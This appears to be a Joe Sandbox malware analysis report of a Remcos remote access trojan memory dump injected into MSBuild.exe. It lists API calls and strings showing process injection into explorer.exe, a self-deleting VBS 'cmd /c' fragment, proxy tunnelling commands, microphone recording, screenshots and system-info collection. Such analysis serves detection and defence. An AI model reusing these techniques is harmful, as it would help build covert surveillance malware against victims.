                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                • API String ID: 489098229-65789007
                                                                                                • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                APIs
                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-390638927
                                                                                                • Opcode ID: b9c1b49b829df1fe2864e03863090dc8d25ea8b56782256c0a9293e84f361e6f
                                                                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                • Opcode Fuzzy Hash: b9c1b49b829df1fe2864e03863090dc8d25ea8b56782256c0a9293e84f361e6f
                                                                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
                                                                                                • SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
                                                                                                • CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
                                                                                                • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,0040466D,00000000,?,?), ref: 00404856
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404867
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 0040486E
                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404880
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404885
                                                                                                • CloseHandle.KERNEL32(?,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 0040488A
                                                                                                • SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?), ref: 00404895
                                                                                                • CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?), ref: 0040489A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                APIs
                                                                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                • GetLastError.KERNEL32 ref: 00454A96
                                                                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                • GetLastError.KERNEL32 ref: 00454C58
                                                                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                • _free.LIBCMT ref: 0043946A
                                                                                                • _free.LIBCMT ref: 00439471
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                • Opcode Fuzzy Hash: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 30cced4407c4bd56c9aac8636a9d351c9d9c58a4e78ece0395014a5f9f46315c
                                                                                                • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                • Opcode Fuzzy Hash: 30cced4407c4bd56c9aac8636a9d351c9d9c58a4e78ece0395014a5f9f46315c
                                                                                                • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$@FG$@FG$Temp
                                                                                                • API String ID: 1107811701-2245803885
                                                                                                • Opcode ID: 920de69f0373f8c5ebd9921b7c2462668ad398608147f3a655d2fcc6e1121eba
                                                                                                • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                • Opcode Fuzzy Hash: 920de69f0373f8c5ebd9921b7c2462668ad398608147f3a655d2fcc6e1121eba
                                                                                                • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                • API String ID: 2050909247-4145329354
                                                                                                • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00446DDF
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 00446DEB
                                                                                                • _free.LIBCMT ref: 00446DF6
                                                                                                • _free.LIBCMT ref: 00446E01
                                                                                                • _free.LIBCMT ref: 00446E0C
                                                                                                • _free.LIBCMT ref: 00446E17
                                                                                                • _free.LIBCMT ref: 00446E22
                                                                                                • _free.LIBCMT ref: 00446E2D
                                                                                                • _free.LIBCMT ref: 00446E38
                                                                                                • _free.LIBCMT ref: 00446E46
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                • API String ID: 3578746661-4192532303
                                                                                                • Opcode ID: 3b2201075f1ab3fd5919af6f491002daf6d5b955dadc3a620faa2112df55390a
                                                                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                • Opcode Fuzzy Hash: 3b2201075f1ab3fd5919af6f491002daf6d5b955dadc3a620faa2112df55390a
                                                                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: f14a08f16dbd2095b7a78a82ca45ed65b45b65831e0b0300d2840b9fe3e549d7
                                                                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                • Opcode Fuzzy Hash: f14a08f16dbd2095b7a78a82ca45ed65b45b65831e0b0300d2840b9fe3e549d7
                                                                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                • API String ID: 3809562944-3643129801
                                                                                                • Opcode ID: e2c4918e224522a1fe961a9da54c3e2121ad945b56a097ac34f834352e4a3164
                                                                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                • Opcode Fuzzy Hash: e2c4918e224522a1fe961a9da54c3e2121ad945b56a097ac34f834352e4a3164
                                                                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: XCG$`=G$x=G
                                                                                                • API String ID: 1356121797-903574159
                                                                                                • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
